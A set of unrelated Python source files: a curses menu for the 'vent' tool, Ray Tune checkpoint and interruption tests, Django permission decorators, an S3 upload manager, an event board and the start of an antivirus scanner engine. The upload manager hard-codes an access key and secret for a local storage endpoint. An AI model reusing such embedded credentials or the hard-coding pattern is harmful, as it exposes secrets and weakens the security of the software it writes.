                    onSelect=self.perform_action,
                    arguments=['stop'], shortcut='p')
    self.m3.addItem(text='Update plugins',
                    onSelect=self.perform_action,
                    arguments=['update'], shortcut='u')
    # Log Menu Items
    self.m4 = self.add_menu(name="Logs", shortcut="l")
    self.m4.addItem(text='Get container logs', arguments=['logs'],
                    onSelect=self.perform_action)
    # Services Menu Items
    self.m5 = self.add_menu(name="Services Running", shortcut='s')
    self.m5.addItem(text='Core Services', onSelect=self.perform_action,
                    arguments=['services_core'], shortcut='c')
    self.m5.addItem(text='External Services', onSelect=self.perform_action,
                    arguments=['services_external'], shortcut='e')
    self.m5.addItem(text='Plugin Services',
                    onSelect=self.perform_action,
                    arguments=['services'], shortcut='p')
    # System Commands Menu Items
    self.m6 = self.add_menu(name="System Commands", shortcut='y')
    self.m6.addItem(text='Backup', onSelect=self.system_commands,
                    arguments=['backup'], shortcut='b')
    self.m6.addItem(text='Change vent configuration',
                    onSelect=self.system_commands, arguments=['configure'],
                    shortcut='c')
    self.m6.addItem(text='Detect GPUs', onSelect=self.system_commands,
                    arguments=['gpu'], shortcut='g')
    self.m6.addItem(text='Enable Swarm Mode (To Be Implemented...)',
                    onSelect=self.system_commands,
                    arguments=['swarm'], shortcut='s')
    self.m6.addItem(text='Factory reset', onSelect=self.system_commands,
                    arguments=['reset'], shortcut='r')
    self.s6 = self.m6.addNewSubmenu(name='Network Tap Interface',
                                    shortcut='n')
    self.m6.addItem(text='Restore', onSelect=self.system_commands,
                    arguments=['restore'], shortcut='t')
    self.m6.addItem(text='Upgrade (To Be Implemented...)',
                    onSelect=self.system_commands,
                    arguments=['upgrade'], shortcut='u')
    self.s6.addItem(text='Create', onSelect=self.system_commands,
                    shortcut='c', arguments=['ntapcreate'])
    self.s6.addItem(text='Delete', onSelect=self.system_commands,
                    shortcut='d', arguments=['ntapdelete'])
    self.s6.addItem(text='List', onSelect=self.system_commands,
                    shortcut='l', arguments=['ntaplist'])
    self.s6.addItem(text='NICs', onSelect=self.system_commands,
                    shortcut='n', arguments=['ntapnics'])
    self.s6.addItem(text='Start', onSelect=self.system_commands,
                    shortcut='s', arguments=['ntapstart'])
    self.s6.addItem(text='Stop', onSelect=self.system_commands,
                    shortcut='t', arguments=['ntapstop'])
    # Tutorial Menu Items
    self.m7 = self.add_menu(name="Tutorials", shortcut="t")
    self.s1 = self.m7.addNewSubmenu(name="About Vent", shortcut='v')
    self.s1.addItem(text="Background", onSelect=self.switch_tutorial,
                    arguments=['background'], shortcut='b')
    self.s1.addItem(text="Terminology", onSelect=self.switch_tutorial,
                    arguments=['terminology'], shortcut='t')
    self.s1.addItem(text="Getting Setup", onSelect=self.switch_tutorial,
                    arguments=['setup'], shortcut='s')
    self.s2 = self.m7.addNewSubmenu(name="Working with Cores",
                                    shortcut='c')
    self.s2.addItem(text="Building Cores", onSelect=self.switch_tutorial,
                    arguments=['building_cores'], shortcut='b')
    self.s2.addItem(text="Starting Cores", onSelect=self.switch_tutorial,
                    arguments=['starting_cores'], shortcut='c')
    self.s3 = self.m7.addNewSubmenu(name="Working with Plugins",
                                    shortcut='p')
    self.s3.addItem(text="Adding Plugins", onSelect=self.switch_tutorial,
                    arguments=['adding_plugins'], shortcut='a')
    self.s4 = self.m7.addNewSubmenu(name="Files", shortcut='f')
    self.s4.addItem(text="Adding Files", onSelect=self.switch_tutorial,
                    arguments=['adding_files'], shortcut='a')
    self.s5 = self.m7.addNewSubmenu(name="Help", shortcut='s')
    self.s5.addItem(text="Basic Troubleshooting",
                    onSelect=self.switch_tutorial,
                    arguments=['basic_troubleshooting'], shortcut='t')
def help_form(self, *args, **keywords):
    """Switch the application over to the help form.

    Extra arguments are accepted (and ignored) so this can be bound
    directly as a key handler.
    """
    self.parentApp.change_form("HELP")
|
test_tune_restore.py | # coding: utf-8
import signal
from collections import Counter
import multiprocessing
import os
import shutil
import tempfile
import threading
import time
from typing import List
import unittest
import ray
from ray import tune
from ray._private.test_utils import recursive_fnmatch
from ray.exceptions import RayTaskError
from ray.rllib import _register_all
from ray.tune import TuneError
from ray.tune.callback import Callback
from ray.tune.suggest.basic_variant import BasicVariantGenerator
from ray.tune.suggest import Searcher
from ray.tune.trial import Trial
from ray.tune.trial_runner import TrialRunner
from ray.tune.utils import validate_save_restore
from ray.tune.utils.mock_trainable import MyTrainableClass
class TuneRestoreTest(unittest.TestCase):
    """Round-trips a PG trial through a checkpoint and a restore."""

    def setUp(self):
        # single local CPU so setup is deterministic and in-process
        ray.init(num_cpus=1, num_gpus=0, local_mode=True)
        tmpdir = tempfile.mkdtemp()
        test_name = "TuneRestoreTest"
        # train exactly one iteration, checkpointing it, to seed the
        # restore tests below
        tune.run(
            "PG",
            name=test_name,
            stop={"training_iteration": 1},
            checkpoint_freq=1,
            local_dir=tmpdir,
            config={
                "env": "CartPole-v0",
                "framework": "tf",
            },
        )
        logdir = os.path.expanduser(os.path.join(tmpdir, test_name))
        self.logdir = logdir
        # first (and only) checkpoint file produced by the run above
        self.checkpoint_path = recursive_fnmatch(logdir, "checkpoint-1")[0]

    def tearDown(self):
        shutil.rmtree(self.logdir)
        ray.shutdown()
        # NOTE(review): presumably re-registers RLlib trainables cleared
        # by ray.shutdown() — confirm against _register_all's docs
        _register_all()

    def testTuneRestore(self):
        # restoring from the checkpoint should train one further iteration
        self.assertTrue(os.path.isfile(self.checkpoint_path))
        tune.run(
            "PG",
            name="TuneRestoreTest",
            stop={"training_iteration": 2},  # train one more iteration.
            checkpoint_freq=1,
            restore=self.checkpoint_path,  # Restore the checkpoint
            config={
                "env": "CartPole-v0",
                "framework": "tf",
            },
        )

    def testPostRestoreCheckpointExistence(self):
        """Tests that checkpoint restored from is not deleted post-restore."""
        self.assertTrue(os.path.isfile(self.checkpoint_path))
        tune.run(
            "PG",
            name="TuneRestoreTest",
            stop={"training_iteration": 2},
            checkpoint_freq=1,
            keep_checkpoints_num=1,  # would evict old checkpoints
            restore=self.checkpoint_path,
            config={
                "env": "CartPole-v0",
                "framework": "tf",
            },
        )
        # the restored-from checkpoint must survive eviction
        self.assertTrue(os.path.isfile(self.checkpoint_path))
# Defining the callbacks at the file level, so they can be pickled and spawned
# in a separate process.
class SteppingCallback(Callback):
    """Lock-step synchronization between the Tune driver and the test.

    After every driver step it signals `driver_semaphore` (the test may
    proceed) and then blocks on `trainer_semaphore` until the test
    releases it.
    """

    def __init__(self, driver_semaphore, trainer_semaphore):
        self.driver_semaphore = driver_semaphore
        self.trainer_semaphore = trainer_semaphore

    def on_step_end(self, iteration, trials, **info):
        self.driver_semaphore.release()  # Driver should continue
        self.trainer_semaphore.acquire()  # Wait until released
def _run(local_dir, driver_semaphore, trainer_semaphore):
    """Child-process entry point: run a 7-step trainable under
    SteppingCallback so the parent test can step the driver in lock-step."""

    def _train(config):
        for i in range(7):
            tune.report(val=i)

    tune.run(
        _train,
        local_dir=local_dir,
        name="interrupt",
        callbacks=[SteppingCallback(driver_semaphore, trainer_semaphore)],
    )
class TuneInterruptionTest(unittest.TestCase):
    """Tests around SIGINT handling during a tune run."""

    def testExperimentInterrupted(self):
        """SIGINT should trigger a final experiment checkpoint before exit.

        The driver runs in a spawned child process and is stepped in
        lock-step via two semaphores (see SteppingCallback / _run).
        """
        local_dir = tempfile.mkdtemp()
        # Unix platforms may default to "fork", which is problematic with
        # multithreading and GRPC. The child process should always be spawned.
        mp_ctx = multiprocessing.get_context("spawn")
        driver_semaphore = mp_ctx.Semaphore()
        trainer_semaphore = mp_ctx.Semaphore()
        process = mp_ctx.Process(
            target=_run,
            args=(local_dir, driver_semaphore, trainer_semaphore),
            name="tune_interrupt",
        )
        process.daemon = False
        process.start()
        exp_dir = os.path.join(local_dir, "interrupt")

        # Skip first five steps
        for i in range(5):
            driver_semaphore.acquire()  # Wait for callback
            trainer_semaphore.release()  # Continue training

        driver_semaphore.acquire()

        # Locate the experiment-state file the driver has written so far.
        experiment_state_file = None
        for file in os.listdir(exp_dir):
            if file.startswith("experiment_state"):
                experiment_state_file = os.path.join(exp_dir, file)
                break
        self.assertTrue(experiment_state_file)
        last_mtime = os.path.getmtime(experiment_state_file)

        # Now send kill signal
        os.kill(process.pid, signal.SIGINT)

        # Release trainer. It should handle the signal and try to
        # checkpoint the experiment
        trainer_semaphore.release()
        time.sleep(2)  # Wait for checkpoint

        # The state file must have been rewritten by the SIGINT handler.
        new_mtime = os.path.getmtime(experiment_state_file)
        self.assertNotEqual(last_mtime, new_mtime)

        shutil.rmtree(local_dir)

    def testInterruptDisabledInWorkerThread(self):
        # https://github.com/ray-project/ray/issues/22295
        # This test will hang without the proper patch because tune.run will fail.
        event = threading.Event()

        def run_in_thread():
            def _train(config):
                for i in range(7):
                    tune.report(val=i)

            tune.run(
                _train,
            )
            event.set()

        thread = threading.Thread(target=run_in_thread)
        thread.start()
        event.wait()
        thread.join()

        ray.shutdown()
        # BUGFIX: the original `del os.environ[...]` raised KeyError whenever
        # the variable had not been set (nothing in this test sets it
        # explicitly — presumably tune sets it internally when running from a
        # worker thread). pop() with a default makes the cleanup safe either way.
        os.environ.pop("TUNE_DISABLE_SIGINT_HANDLER", None)
class TuneFailResumeGridTest(unittest.TestCase):
    """Fail a grid-search run mid-flight, then resume it and verify the
    restored experiment state (trial counts, configs, resources)."""

    class FailureInjectorCallback(Callback):
        """Adds random failure injection to the TrialExecutor."""

        def __init__(self, num_trials=20):
            self.num_trials = num_trials

        def on_step_end(self, trials, **kwargs):
            # NOTE(review): omits the `iteration` parameter of the Callback
            # API — presumably Tune invokes callbacks with keyword arguments
            # so it lands in **kwargs; confirm.
            if len(trials) == self.num_trials:
                print(f"Failing after {self.num_trials} trials.")
                raise RuntimeError

    class CheckStateCallback(Callback):
        """Checks state for the experiment initialization."""

        def __init__(self, expected_trials=20):
            self.expected_trials = expected_trials
            self._checked = False

        def on_step_begin(self, iteration, trials, **kwargs):
            # Only the very first step is checked.
            if not self._checked:
                assert len(trials) == self.expected_trials
                self._checked = True

    class CheckTrialResourcesCallback(Callback):
        """Checks if pending trials are requesting the right amount of
        resources.

        The check happens exactly once after `check_after` number of calls
        to on_step_begin(). Note, we deliberately delay the check to after
        `check_after` number of steps. This is because when we start a
        tuning job from fresh (rather than restored), trial list is still
        empty - any check now would be trivial and thus wasted.
        """

        def __init__(self, expected_cpu: int, check_after: int = 1):
            self._expected_cpu = expected_cpu
            self._checked = False
            self._check_after = check_after

        def on_step_begin(self, iteration: int, trials: List["Trial"], **info):
            if not self._checked and iteration >= self._check_after:
                for trial in trials:
                    if trial.status == Trial.PENDING:
                        assert (
                            trial.placement_group_factory.required_resources.get(
                                "CPU", 0
                            )
                            == self._expected_cpu
                        )
                self._checked = True

    def setUp(self):
        self.logdir = tempfile.mkdtemp()
        # Force experiment-state checkpoints as often as possible (0s interval).
        os.environ["TUNE_GLOBAL_CHECKPOINT_S"] = "0"

        # Change back to local_mode=True after this is resolved:
        # https://github.com/ray-project/ray/issues/13932
        ray.init(local_mode=False, num_cpus=2)

        from ray.tune import register_trainable

        register_trainable("trainable", MyTrainableClass)

    def tearDown(self):
        os.environ.pop("TUNE_GLOBAL_CHECKPOINT_S")
        shutil.rmtree(self.logdir)
        ray.shutdown()

    def testFailResumeGridSearch(self):
        os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"

        config = dict(
            num_samples=3,
            fail_fast=True,
            config={
                "test": tune.grid_search([1, 2, 3]),
                "test2": tune.grid_search([1, 2, 3]),
            },
            stop={"training_iteration": 2},
            local_dir=self.logdir,
            verbose=1,
        )

        # First run is killed after 20 trials (FailureInjectorCallback default).
        with self.assertRaises(RuntimeError):
            tune.run("trainable", callbacks=[self.FailureInjectorCallback()], **config)

        analysis = tune.run(
            "trainable", resume=True, callbacks=[self.CheckStateCallback()], **config
        )
        # 3 samples x 3x3 grid = 27 trials total after resume.
        assert len(analysis.trials) == 27
        test_counter = Counter([t.config["test"] for t in analysis.trials])
        assert all(v == 9 for v in test_counter.values())
        test2_counter = Counter([t.config["test2"] for t in analysis.trials])
        assert all(v == 9 for v in test2_counter.values())

    # Unfinished trials' resources should be updated.
    def testResourceUpdateInResume(self):
        os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"

        config = dict(
            num_samples=3,
            fail_fast=True,
            config={
                "test": tune.grid_search([1, 2, 3]),
                "test2": tune.grid_search([1, 2, 3]),
            },
            stop={"training_iteration": 2},
            local_dir=self.logdir,
            verbose=1,
        )

        with self.assertRaises(RuntimeError):
            tune.run(
                "trainable",
                callbacks=[
                    self.FailureInjectorCallback(),
                    self.CheckTrialResourcesCallback(1),
                ],
                **config,
            )

        # On resume, pending trials must pick up the new 2-CPU request.
        analysis = tune.run(
            "trainable",
            resume=True,
            resources_per_trial={"cpu": 2},
            callbacks=[self.CheckTrialResourcesCallback(2)],
            **config,
        )
        assert len(analysis.trials) == 27

    def testFailResumeWithPreset(self):
        os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"

        search_alg = BasicVariantGenerator(
            points_to_evaluate=[{"test": -1, "test2": -1}, {"test": -1}, {"test2": -1}]
        )

        config = dict(
            num_samples=3 + 3,  # 3 preset, 3 samples
            fail_fast=True,
            config={
                "test": tune.grid_search([1, 2, 3]),
                "test2": tune.grid_search([1, 2, 3]),
            },
            stop={"training_iteration": 2},
            local_dir=self.logdir,
            verbose=1,
        )
        # Fail early, while the preset points are still in flight.
        with self.assertRaises(RuntimeError):
            tune.run(
                "trainable",
                callbacks=[self.FailureInjectorCallback(5)],
                search_alg=search_alg,
                **config,
            )

        analysis = tune.run(
            "trainable",
            resume=True,
            callbacks=[self.CheckStateCallback(expected_trials=5)],
            search_alg=search_alg,
            **config,
        )
        assert len(analysis.trials) == 34
        test_counter = Counter([t.config["test"] for t in analysis.trials])
        # The -1 preset values only occur in the preset-derived trials.
        assert test_counter.pop(-1) == 4
        assert all(v == 10 for v in test_counter.values())
        test2_counter = Counter([t.config["test2"] for t in analysis.trials])
        assert test2_counter.pop(-1) == 4
        assert all(v == 10 for v in test2_counter.values())

    def testFailResumeAfterPreset(self):
        os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"

        search_alg = BasicVariantGenerator(
            points_to_evaluate=[{"test": -1, "test2": -1}, {"test": -1}, {"test2": -1}]
        )

        config = dict(
            num_samples=3 + 3,  # 3 preset, 3 samples
            fail_fast=True,
            config={
                "test": tune.grid_search([1, 2, 3]),
                "test2": tune.grid_search([1, 2, 3]),
            },
            stop={"training_iteration": 2},
            local_dir=self.logdir,
            verbose=1,
        )

        # Fail late, after the preset points have been consumed.
        with self.assertRaises(RuntimeError):
            tune.run(
                "trainable",
                callbacks=[self.FailureInjectorCallback(15)],
                search_alg=search_alg,
                **config,
            )

        analysis = tune.run(
            "trainable",
            resume=True,
            callbacks=[self.CheckStateCallback(expected_trials=15)],
            search_alg=search_alg,
            **config,
        )
        assert len(analysis.trials) == 34
        test_counter = Counter([t.config["test"] for t in analysis.trials])
        assert test_counter.pop(-1) == 4
        assert all(v == 10 for v in test_counter.values())
        test2_counter = Counter([t.config["test2"] for t in analysis.trials])
        assert test2_counter.pop(-1) == 4
        assert all(v == 10 for v in test2_counter.values())

    def testMultiExperimentFail(self):
        os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"

        experiments = []
        for i in range(3):
            experiments.append(
                tune.Experiment(
                    run=MyTrainableClass,
                    name="trainable",
                    num_samples=2,
                    config={
                        "test": tune.grid_search([1, 2, 3]),
                    },
                    stop={"training_iteration": 1},
                    local_dir=self.logdir,
                )
            )

        with self.assertRaises(RuntimeError):
            tune.run(
                experiments,
                callbacks=[self.FailureInjectorCallback(10)],
                fail_fast=True,
            )

        analysis = tune.run(
            experiments,
            resume=True,
            callbacks=[self.CheckStateCallback(expected_trials=10)],
            fail_fast=True,
        )
        # 3 experiments x 2 samples x 3 grid points = 18 trials.
        assert len(analysis.trials) == 18

    def testWarningLargeGrid(self):
        config = dict(
            num_samples=3,
            fail_fast=True,
            config={
                "test": tune.grid_search(list(range(20))),
                "test2": tune.grid_search(list(range(20))),
                "test3": tune.grid_search(list(range(20))),
                "test4": tune.grid_search(list(range(20))),
                "test5": tune.grid_search(list(range(20))),
            },
            stop={"training_iteration": 2},
            local_dir=self.logdir,
            verbose=1,
        )
        # A 20^5 grid should trip the serialization-size warning before the
        # injected failure stops the run.
        with self.assertWarnsRegex(UserWarning, "exceeds the serialization threshold"):
            with self.assertRaises(RuntimeError):
                tune.run(
                    "trainable", callbacks=[self.FailureInjectorCallback(10)], **config
                )
class TuneExampleTest(unittest.TestCase):
    """Smoke-tests save/restore for the bundled example trainables."""

    def setUp(self):
        ray.init(num_cpus=2)

    def tearDown(self):
        ray.shutdown()
        # Restore RLlib trainable registrations for subsequent tests.
        _register_all()

    def testPBTKeras(self):
        from ray.tune.examples.pbt_tune_cifar10_with_keras import Cifar10Model
        from tensorflow.python.keras.datasets import cifar10

        # Pre-fetch the dataset so the trainable does not download it itself.
        cifar10.load_data()
        validate_save_restore(Cifar10Model)
        validate_save_restore(Cifar10Model, use_object_store=True)

    def testPyTorchMNIST(self):
        from ray.tune.examples.mnist_pytorch_trainable import TrainMNIST
        from torchvision import datasets

        # Pre-fetch MNIST for the same reason.
        datasets.MNIST("~/data", train=True, download=True)
        validate_save_restore(TrainMNIST)
        validate_save_restore(TrainMNIST, use_object_store=True)

    def testHyperbandExample(self):
        validate_save_restore(MyTrainableClass)
        validate_save_restore(MyTrainableClass, use_object_store=True)

    def testAsyncHyperbandExample(self):
        validate_save_restore(MyTrainableClass)
        validate_save_restore(MyTrainableClass, use_object_store=True)
class AutoInitTest(unittest.TestCase):
    """tune.run should transparently initialize Ray when it is not running."""

    def testTuneRestore(self):
        # No explicit ray.init() here on purpose.
        self.assertFalse(ray.is_initialized())
        tune.run("__fake", name="TestAutoInit", stop={"training_iteration": 1})
        self.assertTrue(ray.is_initialized())

    def tearDown(self):
        ray.shutdown()
        # Restore RLlib trainable registrations for subsequent tests.
        _register_all()
class SearcherTest(unittest.TestCase):
    """save_to_dir/restore_from_dir round-trip for a Searcher subclass."""

    class MockSearcher(Searcher):
        # NOTE(review): does not call super().__init__() — relies on
        # Searcher tolerating that for save/restore; confirm.
        def __init__(self, data):
            self.data = data

        def save(self, path):
            with open(path, "w") as f:
                f.write(self.data)

        def restore(self, path):
            with open(path, "r") as f:
                self.data = f.read()

    def testSaveRestoreDir(self):
        tmpdir = tempfile.mkdtemp()
        original_data = "hello-its-me"
        searcher = self.MockSearcher(original_data)
        searcher.save_to_dir(tmpdir)
        searcher_2 = self.MockSearcher("no-its-not-me")
        searcher_2.restore_from_dir(tmpdir)
        # The restored searcher must carry the originally saved payload.
        assert searcher_2.data == original_data
class WorkingDirectoryTest(unittest.TestCase):
    def testWorkingDir(self):
        """Trainables should know the original working dir on driver through env
        variable."""
        working_dir = os.getcwd()

        def f(config):
            # Runs inside the trainable; a failing assert fails the run.
            assert os.environ.get("TUNE_ORIG_WORKING_DIR") == working_dir

        tune.run(f)
class TrainableCrashWithFailFast(unittest.TestCase):
    def test(self):
        """Trainable crashes with fail_fast flag and the original crash message
        should bubble up."""

        def f(config):
            tune.report({"a": 1})
            time.sleep(0.1)
            raise RuntimeError("Error happens in trainable!!")

        # fail_fast=RAISE re-raises the trainable's error on the driver.
        with self.assertRaisesRegex(RayTaskError, "Error happens in trainable!!"):
            tune.run(f, fail_fast=TrialRunner.RAISE)
# For some reason, different tests are coupled through tune.registry.
# After running `ResourceExhaustedTest`, there is always a super huge `training_func` to
# be put through GCS, which will fail subsequent tests.
# tldr, make sure that this test is the last test in the file.
class ResourceExhaustedTest(unittest.TestCase):
    def test_resource_exhausted_info(self):
        """This is to test if helpful information is displayed when
        the objects captured in trainable/training function are too
        large and RESOURCES_EXHAUSTED error of gRPC is triggered."""

        # generate some random data to be captured implicitly in training func.
        from sklearn.datasets import fetch_olivetti_faces

        # NOTE(review): fetch_olivetti_faces downloads the dataset on first
        # use — this test needs network access on a cold cache.
        a_large_array = []
        for i in range(10):
            a_large_array.append(fetch_olivetti_faces())

        def training_func(config):
            # Closing over a_large_array makes the serialized function huge.
            for item in a_large_array:
                assert item

        with self.assertRaisesRegex(
            TuneError,
            "The Trainable/training function is too large for grpc resource limit.",
        ):
            tune.run(training_func)
if __name__ == "__main__":
    import pytest
    import sys

    # Forward any extra CLI arguments to pytest and propagate its exit code.
    sys.exit(pytest.main(["-v", __file__] + sys.argv[1:]))
|
decorators.py | import threading
from functools import wraps
from django.core.exceptions import PermissionDenied
def require_member(func):
    """View decorator: allow only requests with a truthy ``user_obj``."""
    @wraps(func)
    def inner(request, *args, **kwargs):
        if not request.user_obj:
            raise PermissionDenied('You must be an active PCF controller to access this endpoint!')
        return func(request, *args, **kwargs)
    return inner
def require_session(func):
    """View decorator: allow only requests with VATSIM session data."""
    @wraps(func)
    def inner(request, *args, **kwargs):
        if not request.session.get('vatsim_data'):
            raise PermissionDenied('You must be logged in to access this endpoint!')
        return func(request, *args, **kwargs)
    return inner
def require_staff(func):
    """View decorator: allow only staff members."""
    @wraps(func)
    def inner(request, *args, **kwargs):
        user = request.user_obj
        if user and user.is_staff:
            return func(request, *args, **kwargs)
        raise PermissionDenied('You must be a staff member to access this endpoint!')
    return inner
def require_mentor(func):
    """View decorator: allow only mentors/instructors."""
    @wraps(func)
    def inner(request, *args, **kwargs):
        user = request.user_obj
        if user and user.is_mentor:
            return func(request, *args, **kwargs)
        raise PermissionDenied('You must be a mentor or instructor to access this endpoint!')
    return inner
def require_staff_or_mentor(func):
    """View decorator: allow staff members or mentors/instructors."""
    @wraps(func)
    def inner(request, *args, **kwargs):
        user = request.user_obj
        if user and (user.is_staff or user.is_mentor):
            return func(request, *args, **kwargs)
        raise PermissionDenied('You must be staff, mentor, or instructor to access this endpoint!')
    return inner
def require_role(role_list):
    """Decorator factory: allow only users whose ``main_role`` is in ``role_list``."""
    def decorator(func):
        @wraps(func)
        def inner(request, *args, **kwargs):
            user = request.user_obj
            if user and user.main_role in role_list:
                return func(request, *args, **kwargs)
            raise PermissionDenied('You lack the necessary role to access this endpoint!')
        return inner
    return decorator
def run_async(func):
    """Decorator: run the wrapped function on a background thread.

    BUGFIX: the original implementation forwarded only positional
    arguments to the thread target, silently dropping all keyword
    arguments. Both are now passed through.

    The wrapper also returns the started ``threading.Thread`` so callers
    may join it; existing callers that ignore the return value are
    unaffected.
    """
    @wraps(func)
    def inner(*args, **kwargs):
        thread = threading.Thread(target=func, args=args, kwargs=kwargs)
        thread.start()
        return thread
    return inner
|
uploadMgr.py | import scanner
from fileReader import FileReader
from s3FileUpload import S3FileUpload
from queue import Queue
import time
import os
import threading
# Bounded queue of work items produced by the Scanner and consumed by the
# uploader threads (presumably file paths — see scanner.py to confirm).
fileQ = Queue(10000)
# Unbounded queue for error reports from the scanner/readers.
errorReportQ = Queue()
# Start scanning c:\python and feeding the queues.
scanner.Scanner('c:\\python', fileQ, errorReportQ).start()
def upload():
    """Worker: read file chunks from a FileReader and stream them to S3.

    Assumes FileReader pushes [data, filePath, fileSize] triples onto
    fr.chunkQ, using a falsy `data` as the per-file end marker and a falsy
    whole chunk as the end-of-stream marker — TODO confirm in fileReader.py.
    """
    # 10 MiB read-chunk size.
    fr = FileReader(fileQ, errorReportQ, 1024 * 1024 * 10)
    fr.run()
    # NOTE(review): credentials and endpoint are hard-coded here — move to
    # configuration/environment and rotate these keys.
    s3 = S3FileUpload(
        'us-east-1',
        'RNLJDN0K03B7HHZPZTK3',
        'joayaC6Gw5JfzHDoYTFWcQH0xJT94Bpb5Eroood2',
        'http://192.168.68.113:9000',
        'test'
    )
    while True:
        chunk = fr.chunkQ.get()
        if not chunk:
            # Falsy chunk: no more files; this worker is done.
            break
        [data, filePath, fileSize] = chunk
        key = filePath
        if os.name == 'nt':
            # Windows: normalize "C:\a\b" to an S3-style key "/C/a/b".
            key = '/' + filePath.replace('\\', '/').replace(':', '')
        s3.startFileSend(key, fileSize)
        s3.sendFileData(data)
        while True:
            if not data:
                # Empty data marks end of the current file.
                # NOTE(review): the empty marker itself was already passed to
                # sendFileData() on the previous iteration — confirm the S3
                # helper tolerates a zero-length write.
                s3.endFileSend()
                break
            [data, filePath, fileSize] = fr.chunkQ.get()
            s3.sendFileData(data)
# Spawn ten concurrent uploader workers and wait for all of them to finish.
startTime = time.time()
threads = [threading.Thread(target=upload) for _ in range(10)]
for worker in threads:
    worker.start()
for worker in threads:
    worker.join()
print('All done in', round(time.time() - startTime), 'seconds')
event_board.py | from typing import Callable
from threading import Thread
from functools import partial
from collections import defaultdict
from multiprocessing import Pipe, SimpleQueue
from pipert2.core.handlers.event_handler import EventHandler
from pipert2.utils.method_data import Method
from pipert2.utils.consts.event_names import KILL_EVENT_NAME, STOP_EVENT_NAME, START_EVENT_NAME
DEFAULT_EVENT_HANDLER_EVENTS = [START_EVENT_NAME, STOP_EVENT_NAME, KILL_EVENT_NAME]
class EventBoard:
    """The event board is responsible for managing the event system in the pipe.

    Listeners register via `get_event_handler`; `event_loop` (started on a
    background thread by `build`) fans each queued event out to the pipes
    subscribed to its name.
    """

    def __init__(self):
        # Maps event name -> list of pipe write-ends subscribed to it.
        self.events_pipes = defaultdict(list)
        # Incoming events awaiting dispatch by the event loop.
        self.new_events_queue = SimpleQueue()

    def get_event_handler(self, events_to_listen: list):
        """Return an event handler adjusted to the given events.

        Args:
            events_to_listen: List of event names to listen.

        Returns:
            An event handler adjusted to the given events.
        """
        pipe_output, pipe_input = Pipe(duplex=False)

        # NOTE(review): if events_to_listen overlaps the default events, the
        # pipe is registered twice and will receive those events twice.
        for event_name in events_to_listen:
            self.events_pipes[event_name].append(pipe_input)

        for default_event_name in DEFAULT_EVENT_HANDLER_EVENTS:
            self.events_pipes[default_event_name].append(pipe_input)

        return EventHandler(pipe_output)

    def event_loop(self):
        """Wait for new events to come and spread them to the pipes."""
        event: Method = self.new_events_queue.get()

        while event.event_name != KILL_EVENT_NAME:
            for pipe in self.events_pipes[event.event_name]:
                pipe.send(event)
            event = self.new_events_queue.get()

        # Send the kill event to the other pipes
        for pipe in self.events_pipes[event.event_name]:
            pipe.send(event)

    def build(self):
        """Start the event loop on a background thread."""
        self.event_board_thread = Thread(target=self.event_loop)
        self.event_board_thread.start()

    def get_event_notifier(self) -> Callable:
        """Return a callable for notifying that new event occurred."""

        def notify_event(output_event_queue, event_name,
                         specific_flow_routines: dict = None, **params):
            # BUGFIX: the original used a mutable default value
            # (defaultdict(list)) shared by every call, so routines added by
            # one notification leaked into all subsequent ones. Passing
            # nothing now yields a fresh empty defaultdict per call.
            if specific_flow_routines is None:
                specific_flow_routines = defaultdict(list)
            output_event_queue.put(
                Method(event_name,
                       specific_flow_routines=specific_flow_routines,
                       params=params))

        return partial(notify_event, self.new_events_queue)

    def notify_event(self, event_name,
                     specific_flow_routines: dict = None, **params):
        """Queue an event for dispatch by the event loop."""
        # BUGFIX: same shared-mutable-default hazard as in get_event_notifier.
        if specific_flow_routines is None:
            specific_flow_routines = defaultdict(list)
        self.new_events_queue.put(Method(event_name=event_name,
                                         specific_flow_routines=specific_flow_routines,
                                         params=params))

    def join(self):
        """Block until the event-loop thread terminates (after KILL_EVENT_NAME)."""
        self.event_board_thread.join()
|
scanner_engine.py |
from iemlav.lib.antivirus.scanner.hash_scanner import HashScanner
from iemlav.lib.antivirus.scanner.yara_scanner import YaraScanner
from iemlav.lib.antivirus.scanner.clamav_scanner import ClamAVScanner
from iemlav.lib.antivirus.antivirus_logger import AntiVirusLogger
import multiprocessing
import sys
class ScannerEngine(object):
    """ScannerEngine class.

    Orchestrates three anti-virus scanner back-ends (hash, Yara, ClamAV)
    over a shared file list, each running in its own process.
    """

    def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None):
        """Initialize ScannerEngine.

        Args:
            debug: Enable debug logging.
            config_path: Path to the AV configuration file (required).
            vt_api_key: VirusTotal API key, forwarded to every scanner.
            file_list: Files to scan; defaults to an empty list.
        """
        # Initialize logger
        self.logger = AntiVirusLogger(
            __name__,
            debug=debug
        )

        if config_path is not None:
            self._CONFIG_PATH = config_path
        else:
            self.logger.log(
                "Configuration file path not found.",
                logtype="error"
            )
            # NOTE(review): exits with status 0 even though this is an error
            # path — confirm a non-zero exit code isn't expected here.
            sys.exit(0)

        if file_list:
            self.file_list = file_list
        else:
            # Initialize an empty list
            self.file_list = []

        # Create HashScanner object
        self.hash_scanner = HashScanner(debug=debug,
                                        config_path=self._CONFIG_PATH,
                                        file_list=self.file_list,
                                        vt_api_key=vt_api_key)
        # Create YaraScanner object
        self.yara_scanner = YaraScanner(debug=debug,
                                        config_path=self._CONFIG_PATH,
                                        file_list=self.file_list,
                                        vt_api_key=vt_api_key)
        # Create ClamAVScanner object
        self.clamd_scanner = ClamAVScanner(debug=debug,
                                           config_path=self._CONFIG_PATH,
                                           file_list=self.file_list,
                                           vt_api_key=vt_api_key)
        # List of process in action
        self.process_pool = []

    def start_scanner_engine(self):
        """
        Start the scanner engine and start scanning
        the files using three (3) engines in a multi-processing
        environment.

        1. Hash Scanner Engine
        2. Yara Scanner Engine
        3. Clam AV Scanner Engine

        Returns:
            bool: always True — on success, on KeyboardInterrupt, and on
            error. NOTE(review): callers cannot distinguish failure from
            success; confirm whether that is intended.
        """
        try:
            # Create Hash Scanner process
            hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)
            # Create Yara Scanner process
            yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)
            # Create Clam AV Scanner process
            clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)

            # Add Hash Scanner process to process list
            self.process_pool.append(hash_scanner_process)
            # Add Yara Scanner process to process list
